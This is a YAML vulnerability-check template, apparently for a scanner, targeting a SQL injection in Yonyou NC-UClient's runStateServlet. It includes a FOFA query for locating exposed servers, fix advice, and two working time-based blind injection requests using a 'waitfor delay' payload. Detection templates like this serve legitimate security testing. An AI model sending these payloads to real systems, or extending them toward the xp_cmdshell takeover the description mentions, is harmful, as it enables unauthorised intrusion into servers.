product: 用友NC-UClient
vName: 用友NC-UClient runStateServlet-proDefPk SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NClient /portal/pt/servlet/runStateServlet接口存在SQL注入漏洞，攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。
version: <=6.5
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/137634934
fix:
  - 关闭互联网暴露面或接口设置访问权限
  - 升级至安全版本
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'--
      header:
        Content-Type: application/x-www-form-urlencoded
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:0'--
      header:
        Content-Type: application/x-www-form-urlencoded
    verify:
      path: ''
      logic: and
      check:
        - time:
            check: <=
            num: 3